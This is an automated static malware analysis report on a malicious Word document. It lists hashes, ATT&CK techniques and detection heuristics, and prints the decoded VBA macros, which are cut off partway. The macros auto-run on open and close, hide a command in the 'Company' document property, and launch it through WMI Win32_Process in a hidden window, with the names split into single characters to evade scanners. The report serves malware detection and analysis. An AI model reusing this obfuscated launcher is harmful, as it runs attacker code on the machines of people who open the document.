Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d69b216776dbb710…

MALICIOUS

Office (OLE)

Size: 270.0 KB | Created: 2018-05-17 20:23:00 | Authoring application: Microsoft Office Word | First seen: 2019-09-30
MD5: f19189e08ce01fd83c9929dfce5d79a4
SHA-1: e3f8e22c6e5ca6800dc5a4db9cf0e1f101e886f2
SHA-256: d69b216776dbb71071efb6de2a7ef1f82bf1687d856612ead73c549a6d200dab
Risk Score: 342

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains VBA macros, including AutoClose and Document_Open, which are commonly used to initiate malicious actions. The script uses obfuscated strings to reconstruct the WMI service name 'winmgmts:\\.\root\cimv2:Win32_Process' and then calls the Create method to launch a process. This indicates an attempt to execute arbitrary code on the victim's system, likely to download and run a secondary payload.

Heuristics (9)

  • ClamAV: Doc.Malware.Valyria-6923037-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923037-0
  • VBA macros detected medium (5 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/drawingml/2006/main - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography - In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml - In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5714 bytes
SHA-256: c561e3caa971fffdb566e5eac8f2c2641e7d3696df3c67c2b3406d7ee70d7a5a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Function oCINtECFoiZZ() As Variant
    Dim oYsvvHGpyNAl As DocumentProperty
    For Each oYsvvHGpyNAl In ActiveDocument.BuiltInDocumentProperties
        If oYsvvHGpyNAl.Name = "C" & "o" & "m" & "p" & "a" & "n" & "y" Then
            Dim zgpDyYsowvjC As String
            zgpDyYsowvjC = Replace(oYsvvHGpyNAl.Value, "!<%#>+=*})$]{&([_?-/", "")
            Const HIDDEN_WINDOW = 0
            Set NyRRsIyWHHtD = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2")
            Set CmFJiLnYnxFF = NyRRsIyWHHtD.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s" & "S" & "t" & "a" & "r" & "t" & "u" & "p")
            Set oJcxTgEMEZCd = CmFJiLnYnxFF.SpawnInstance_
            oJcxTgEMEZCd.ShowWindow = HIDDEN_WINDOW
            Set UXTFKvnzifDS = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
            UXTFKvnzifDS.Create zgpDyYsowvjC, Null, oJcxTgEMEZCd, gUCshaKrmBMP
        End If
    Next
End Function


Private Sub Document_Open()
Call doStuffBiatch
End Sub

Attribute VB_Name = "NewMacros"
Sub Auto_Close()
    ukszYtOmZvKp
End Sub

Sub AutoClose()
    ukszYtOmZvKp
End Sub

Public Function ukszYtOmZvKp() As Variant
    Dim LFOFpVUwMumQ As DocumentProperty
    For Each LFOFpVUwMumQ In ActiveDocument.BuiltInDocumentProperties
        If LFOFpVUwMumQ.Name = "C" & "o" & "m" & "p" & "a" & "n" & "y" Then
            Dim IhlYgvEmaKBv As String
            IhlYgvEmaKBv = Replace(LFOFpVUwMumQ.Value, "=}*&<_(%{)#-][+!?/$>", "")
            Const HIDDEN_WINDOW = 0
            Set BvsQYrdVtkyQ = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2")
            Set tnDljCtwvcFA = BvsQYrdVtkyQ.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s" & "S" & "t" & "a" & "r" & "t" & "u" & "p")
            Set otYxhAcYiLFm = tnDljCtwvcFA.SpawnInstance_
            otYxhAcYiLFm.ShowWindow = HIDDEN_WINDOW
            Set VmATsmcJgLQW = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
            VmATsmcJgLQW.Create IhlYgvEmaKBv, Null, otYxhAcYiLFm, qHlsjUnjgSpi
        End If
    Next
End Function

Attribute VB_Name = "Module1"
Sub doStuffBiatch()
    Dim thisDocument As Document
    Set thisDocument = ActiveDocument
    Dim numberOfTables As Integer
    Dim Tb As Table
    Dim defaultString As String
    defaultString = "*Data from external source not loaded"
    Dim MyValue
    Dim ESI As String
    Dim resultComparison As Integer
    
    numberOfTables = thisDocument.Tables.Count
    
    For TableNumber = 2 To numberOfTables:
        'Debug.Print TableNumber
        numberOfRows = thisDocument.Tables(TableNumber).Rows.Count
        numberOfCol = thisDocument.Tables(TableNumber).Columns.Count
        Dim cellContent As String
        For fila = 2 To numberOfRows:
            For col = 2 To numberOfCol:
                cellContent = thisDocument.Tables(TableNumber).Cell(fila, col).Range.Text
                If InStr(1, cellContent, defaultString, vbTextCompare) = 1 Then
                    Debug.Print "True como una catedral"
                    If fila = 2 Then
                        MyValue = ((CLng(4 * Rnd) + 1) / 10)
                    ElseIf fila = 3 Then
                        MyValu
... (truncated)